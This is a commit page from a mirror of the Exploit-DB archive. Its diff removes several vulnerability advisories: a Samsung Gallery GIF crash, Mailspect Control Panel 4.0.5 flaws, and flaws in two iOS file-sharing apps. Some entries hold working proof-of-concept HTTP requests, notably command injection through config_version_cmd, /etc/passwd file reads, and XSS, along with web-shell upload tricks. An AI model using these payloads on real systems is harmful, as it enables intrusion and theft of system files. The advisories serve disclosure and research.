bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-07-11

Browse source
This commit is contained in:
Offensive Security 2016-07-11 05:06:57 +00:00
parent c9a818eb76
commit 76bc268c80
27 changed files with 441 additions and 1556 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

777
files.csv
View file

File diff suppressed because it is too large Load diff

31
platforms/android/dos/39023.txt
View file

@ -1,31 +0,0 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=500
There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.
D/skia (10905): GIF - Parse error
D/skia (10905): --- decoder->decode returned false
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
I/DEBUG ( 2958):
I/DEBUG ( 2958): backtrace:
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex
To reproduce, download the file and open it in Gallery
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip

2
platforms/cgi/remote/20938.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/2889/exploit
source: http://www.securityfocus.com/bid/2889/info
DCShop is a GCI-based ecommerce system from DCScripts.

2
platforms/cgi/remote/20939.txt
View file

@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/2889/exploit
source: http://www.securityfocus.com/bid/2889/info
DCShop is a GCI-based ecommerce system from DCScripts.

147
platforms/cgi/webapps/33895.txt
View file

@ -1,147 +0,0 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities
Release Date:
===========
June 21, 2014
Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.
Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.
Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.
Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure
Discovery Status:
=============
Published
Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.
Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.
2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.
3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.
4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.
Proof of Concept (PoC):
==================
Proof of Concept RCE Request:
POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60
2. Proof of Concept AFR Request 1:
GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
3. Proof of Concept AFR Request 2:
POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on
4. Proof of Concept XSS Request:
GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.
Security Risk:
==========
The risk of the vulnerabilities above estimated as high.
Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ
Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.
Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr
Copyright © 2014 | BGA Security

311
platforms/ios/webapps/30245.txt
View file

@ -1,311 +0,0 @@
Document Title:
===============
Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1168
Release Date:
=============
2013-12-11
Vulnerability Laboratory ID (VL-ID):
====================================
1168
Common Vulnerability Scoring System:
====================================
7.6
Product & Service Introduction:
===============================
Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or
PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive
features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most
of the file operations: like delete, move, copy, email, share, zip, unzip and more.
(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2013-12-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Eightythree Technologies
Product: Phone Drive - Mobile Application 4.1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.
The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1.
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.
Request Method(s):
[+] [GET]
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index File Dir List - [Header]
1.2
A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application.
The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface).
Remote attackers can manipulate the filename value in the POST method request of the file upload form to cpmpromise the mobile application.
Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request
method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web
vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
1.3
An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
1.4
A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module.
Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject
in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the
file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an
exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent
input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+).
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] foldername (path)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)
Proof of Concept (PoC):
=======================
1.1
The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: DeviceName - Index File Dir List
<tr>
<td><a href="http://localhost:80/"><img src="Phone%20Drive%20-%20devicename_files/webicon.png" id="headerImg" height="57" width="57"></a></td>
<td><h2>device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]"></h2></td>
<td width="170" align="center"><a
href="http://www.eightythreetech.com" target="_blank"><img
src="/webroot/moreapps.png"/></a></td>
</tr>
</table>
1.2
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.
PoC:
<tr class="c"><td class="e"><input name="selection" value="[LOCAL FILE INCLUDE VULNERABILITY!]" type="checkbox"></td>
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" height="20"
width="20"></a></td><td class="n"><a href="[LOCAL FILE INCLUDE VULNERABILITY!]">[LOCAL FILE INCLUDE VULNERABILITY!]</a></td><td class="m">
17.09.2015 18:07</td><td class="s">24.7 KB</td><td class="k">Safari Web Archive</td><td class="e">
<a href="#" title="Download file" onclick="downloadFile("[LOCAL FILE INCLUDE VULNERABILITY!]");">
<img src="/webroot/webdownload.png" height="15" width="15"></a></td><td class="e"><a href="#"
title="Rename file" onclick="modalPopup("Help.webarchive", 0, 1);">
<img src="/webroot/webrename.png" height="15" width="15"></a></td><td class="e">
<a href="#" title="Delete file" onclick="modalPopup("Help.webarchive", 2, 1);">
<img src="/webroot/webdelete.png" height="15" width="15"></a></td></tr>
1.3
The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction
or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information
and steps below.
PoC Session Logs: qqfile
Status: 200 OK
POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg
Load Flags[LOAD_BYPASS_CACHE ]
Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[192.168.2.106]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg]
Content-Type[application/octet-stream]
Referer[http://192.168.2.106/]
Content-Length[98139]
Post Data:
POST_DATA[‰PNG
1.4
The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account
and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
PoC: Creat Folder - Index File Dir List & Sub Category List
<tr class="c"><td class="e"><input name="selection"
value="%3E%22%3Cx%20src=a%3E" type="checkbox"></td><td class="i">
<a href="http://localhost/%3E%22%3Ciframe%20src=a%3E/"><img src="Phone%20Drive%20-%20pathname_files/folder.png"
height="20" width="20"></a></td><td class="n"><a href="http://localhost/%3E%22%3Cx%3E/">
>"<[PERSISTENT INJECTED SCRIPT CODE!]"></a></td><td
class="m">11.12.2013 13:29</td><td
Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure encode of the devicename value in the ehader section of the index module.
1.2 - 1.3
Restrict the filename input and parse the context with a filter mechanism. Disallow multiple file extensions and implement
a own exception-handling to prevent arbitrary file uploads or restricted file uploads.
Security Risk:
==============
1.1
The security risk of the local command inject web vulnerability is estimated as high(-).
1.2 - 1.3
The security risk of the local file include web vulnerability via file and folder name value is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright <20> 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

214
platforms/ios/webapps/35059.txt
View file

@ -1,214 +0,0 @@
Document Title:
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1343
Release Date:
=============
2014-10-21
Vulnerability Laboratory ID (VL-ID):
====================================
1343
Common Vulnerability Scoring System:
====================================
9
Product & Service Introduction:
===============================
Try a file manager thats unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!
(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.
The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.
The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Create Folder
Vulnerable Parameter(s):
[+] createdir?path=(name)
Affected Module(s):
[+] Wifi Interface (index.html)
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!
PoC: index.html (Name) [createdir?path=]
<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()" type="button">
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="uploadFilesButtonClick()" type="button">
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="createFolderButtonClick()" type="button">
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick()" type="button">
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="unselectAllButtonClick()" type="button">
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer">
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><td index="1" field="ext"
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><td index="1" field="ext" id="fileListTable_2_1"
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></tbody></table></div>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/index.html]
Connection[keep-alive]
Response Header:
Connection[Keep-Alive]
Content-Length[43]
Status: 200[OK]
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:80/index.html]
Connection[keep-alive]
Response Header:
Connection[Close]
Date[Sun, 19 Oct 2014 16:22:46 GMT]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
index.html file to prevent application-side code execution attacks.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

2
platforms/linux/dos/15935.c
View file

@ -1,4 +1,4 @@
source: http://securityreason.com/securityalert/8003
// source: http://securityreason.com/securityalert/8003
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

11
platforms/linux/dos/31190.txt
View file

@ -1,11 +0,0 @@
source: http://www.securityfocus.com/bid/27778/info
OpenLDAP is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to deny service to legitimate users.
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
